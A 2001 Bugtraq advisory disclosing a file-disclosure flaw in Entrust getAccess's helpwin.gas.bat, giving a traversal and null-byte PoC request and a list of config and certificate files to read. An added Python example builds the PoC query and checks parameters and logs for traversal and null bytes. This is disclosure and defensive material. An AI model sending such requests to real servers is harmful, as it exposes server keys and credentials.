Bugtraq: New getAccess[tm] Vulnerability

New getAccess[tm] Vulnerability

From: rudi carell <rudicarell_at_hotmail.com>
Date: Mon, 05 Nov 2001 14:17:14

Good morning, list members,

this is another posting (see the first one here: http://www.securityfocus.com/bid/3109)
about Entrust's "getAccess[tm]" product.

Problem Description:

"getAccess[tm]" (still) uses default shell scripts which start Java classes
for its web applications.

Due to missing input validation it is possible to read files with getAccess's
permissions on the "getAccess" machine (this only works in combination with
other input fields, as described below).
In connection with config and other files this can lead to a
total server compromise (don't ask me how :-).

POC-Example:

An HTTP request to:
http://getAccessHostname/sek-bin/helpwin.gas.bat?

with the following parameters:
mode=
&draw=x
&file=x
&module=
&locale= [relative FILE/PATH] [Nullbyte/0x00] [Backslash/0x5c]
&chapter=

... will lead to disclosure of [FILE/PATH]

Config file list (depends heavily on the configuration; the files can be found
two traversals back [../../]):

/config/acl-runtime.conf
/config/administration.conf
/config/applist.conf
/config/authmethod.conf
/config/clientCert.conf
/config/connection.conf
/config/directories.conf
/config/domainAuth.conf
/config/hook.conf
/config/license.conf
/config/log.conf
/config/login.conf
/config/misc.conf
/config/pmda.conf
/config/redirection.conf
/config/registry.conf
/config/serverCert.conf
/config/serverConnection.conf
/config/source_systems.conf
/config/version.conf
/config/serverReq.pem
/config/serverCert.pem
/config/certs

Summary:

object: helpwin.gas.bat (CGI shell script)

class: referring to OWASP-IV (Input Validation Classes)

Directory Traversal (IV-DT-1)
http://www.owasp.org/projects/cov/owasp-iv-dt-1.htm
Null Character (IV-NC-1)
http://www.owasp.org/projects/cov/owasp-iv-nc-1.htm
Meta Character (IV-MC-1)
http://www.owasp.org/projects/cov/owasp-iv-mc-1.htm

remote: yes
local: ---

vendor: has been informed by separate e-mail
(security_at_entrust.com/entrust_at_entrust.com)

patch/fix: is already available and will be posted by Entrust here today.

recommended fix: sanitize meta-characters from user input

personal remark: using shell scripts for security-related software has
always been dangerous!!!

nice day,

rC

security_at_freefly.com
rudicarell_at_hotmail.com
http://www.freefly.com/security/

check out the brand new Open Web Application Security Project
http://www.owasp.org

Received on Nov 05 2001
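The following is an added example, not code from the post or from Entrust. It builds the request the advisory describes (the `locale` value followed by a NUL and a backslash), shows what a NUL-terminated C string layer sees of that value, and implements the kind of parameter check the author recommends: reject traversal sequences, null bytes and shell/path meta-characters, and hold `locale` to an allow-list. The endpoint and parameter names are those given in the post; the locale allow-list pattern (`en`, `de_DE`) and the sample queries are assumptions for illustration.

```python
"""Added example (not from the advisory or the product): build the PoC
query, show NUL truncation, and check CGI parameters before they reach
a shell wrapper."""
import re
import urllib.parse

# Endpoint and parameter names as given in the advisory.
HELPWIN = "http://getAccessHostname/sek-bin/helpwin.gas.bat"


def build_poc_query(rel_path):
    """Return the advisory's query string with `rel_path` in `locale`,
    followed by a NUL (0x00) and a backslash (0x5c), URL-encoded."""
    params = [
        ("mode", ""), ("draw", "x"), ("file", "x"), ("module", ""),
        ("locale", rel_path + "\x00\\"), ("chapter", ""),
    ]
    return "&".join(f"{k}={urllib.parse.quote(v, safe='/')}" for k, v in params)


def c_string_view(value):
    """What a NUL-terminated C string (argv of an exec'd script, a C
    library call) sees: everything after the first NUL is dropped, so a
    suffix the application appends after the value is cut off."""
    return value.split("\x00", 1)[0]


# Shell and path meta-characters a CGI shell wrapper must never pass through.
META = re.compile(r"[\x00\\/;&|`$<>\"'\s]")
# ".." as a complete path component, with either separator.
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
# Assumed allow-list for a locale such as en or de_DE; the product's real
# locale format is not given in the advisory.
LOCALE_OK = re.compile(r"[a-z]{2}(_[A-Z]{2})?")


def check_param(name, value):
    """Return the list of findings for one decoded query parameter
    (empty list means the value is acceptable)."""
    findings = []
    if "\x00" in value:
        findings.append("null byte")
    if TRAVERSAL.search(value):
        findings.append("directory traversal")
    if META.search(value.replace("\x00", "")):
        findings.append("meta character")
    if name == "locale" and not LOCALE_OK.fullmatch(value):
        findings.append("locale not in allow-list")
    return findings


def check_query(query):
    """Decode a raw query string and return {param: findings} for every
    parameter that fails check_param. An empty dict means the request
    is clean and may be handed to the wrapper."""
    decoded = urllib.parse.parse_qs(query, keep_blank_values=True)
    bad = {}
    for name, values in decoded.items():
        for v in values:
            found = check_param(name, v)
            if found:
                bad[name] = found
    return bad


if __name__ == "__main__":
    # Constructed sample: a path two traversals back, as in the advisory.
    q = build_poc_query("../../config/license.conf")
    print(HELPWIN + "?" + q)
    print("C string sees:", c_string_view("../../config/license.conf\x00\\"))
    print("PoC findings:", check_query(q))
    print("Clean query:", check_query("mode=&draw=x&file=x&module=&locale=de_DE&chapter="))
```

`check_query` can also be run over decoded query strings pulled from web server logs to find past probes of the same shape; any hit on `null byte` or `directory traversal` in a parameter that a shell wrapper forwards is worth a closer look.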
